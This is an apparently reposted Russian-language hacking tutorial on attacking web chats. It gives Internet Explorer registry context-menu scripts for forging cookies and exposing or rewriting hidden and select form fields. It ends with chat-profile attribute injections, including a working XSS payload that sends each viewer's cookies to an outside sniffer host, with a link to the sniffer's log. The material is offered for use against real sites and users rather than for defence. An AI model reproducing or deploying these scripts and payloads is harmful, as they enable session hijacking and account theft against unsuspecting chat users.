| |
| |
|
|
Наверное, основным и самым главным аспектом во взломе чатов является
сохранение формы на диск, после чего начинается преобразование форм до
нужных нам значений ... Но благодаря zFailure есть альтернативное решение данной проблемы. Благодаря этому методу мы можем легко изменить значения любых параметров, подделать файлы cookies, не прибегая к специальным программам и сохранению чата на диск... Что мы сейчас делаем: Жмахаем на Пуск, Выполнить, там вводим команду regedit (редактор реестра windows)... Там находим ключик: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\MenuExt\ Тут мы можем добавить новые значения для контекстного меню нашего осла ... Нажимаем правой кнопкой мыши на MenuExt, в создавшемся меню ищем Создать > Раздел ... Первый шаг сделан. Присваиваем ему имя Исходный код &Cookies & означаен подчеркивание следующего за ним символа. (для понта сойдет ) Назвать мы можем как угодно ... Все, теперь открываем проводник, заходим в основной каталог диска C: (у кого он D, F -- у меня С). Там создаем файл cookies.html следующего содержания: Исходный код <script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zExpires() { var expires = new Date(); expires.setYear(expires.getYear() + 10); return expires.toUTCString(); } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zCookie = zDocument.cookie; var zNew = zWindow.prompt('Подделать Cookie?', zCookie); if (zNew != null) { var zNewCookie = zWindow.prompt('New Cookie:', '; EXPIRES=' + zExpires() + ';'); if (zNewCookie != null) zDocument.cookie = zNewCookie; } </script> Все. Теперь этот файл доступен по адресу C:/cookies.html Переходим обратно к реестру. Находим только что созданный нами ключик: HREY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\MenuExt\&Cookies Изменяем его параметры: Присваиваем ему значение Исходный код C:/cookies.html Т.е. абсолютный адрес нашего скрипта. Аналогично делаем и со следующими скриптами: Исходный код <script type="text/javascript"> var xWin = external.menuArguments; var xDoc = xWin.document; for (i = 0; i <= xDoc.forms.length - 1; i ++) { for (j = 0; j <= xDoc.forms[i].elements.length - 1; j ++) { if (xDoc.forms[i].elements[j].type == 'hidden') { xDoc.forms[i].elements[j].outerHTML = '<input type="text" name="' + xDoc.forms[i].elements[j].name + '" value="' + xDoc.forms[i].elements[j].value + '" style="color: Black;">'; } } } </script> И еще один: Исходный код <script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'select-one') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script> Думаю, не стоит объяснять, для чего нужны эти скрипты ... Все. Теперь мы заходим в любой чат, нажимаем правую кнопку мыши и выбираем любое значение из контекстного меню ... P.S: Внимание! С реестром нужно работать крайне осмотрительно! Если вы тут что-то не поняли, то лучше спросите, чем потом сидеть и гадать над дохлым ослом, который отказывается запускаться. P.S.S: Файлы желательно сохранять в корне диска C: и имя должно обязательно состоять из латинских символов (англ. букв) Никаких имен, как Куки.html! P.S.S.S: Это далеко не все скрипты . С другими вы можете ознакомится тут: http://forum.antichat.ru/cgi-bin....;t=2400 Параллельное обсуждение темы -------------- © Че Гевара 1989-2004 Черпак Фишка №1. В чате разрешен тэг font, точнее только font color, но это только кажется . Итак, пишем прямо в тексте сообщения <font color='00ff00" size=6 face=Impact "'>Hi all!</font>. Что получится из этого, думаю, ясно. А теперь продолжим эту идею: <font color='00ff00" style="font-size:200px;font-family:Impact;background:url(http://бесплатный сервак.ру/картинка.гиф)" "'>Hi all!</font> Поидее должны получить текст в 200 пикселей с фоновой картинкой. Но я предепочёл бы по лучше способ: <font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px; color:#000000;FONT-FAMILY:arial;background:url(http://image)'> ФРИК</font> сли в своей инфе указать: URL http://z.ru`" z=` А о себе ` style="background:url(javascript:x=new Image()\;x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie)" z то любой кто просмотрит вашу инфу в чате становятся вашими невольными жертвами http://antichat.ru/sniff/log.php |
| Дизайн и разработка сайта |  |
"Проект Amega" |
© 2000-2005 Все права защищены и охраняются законом.
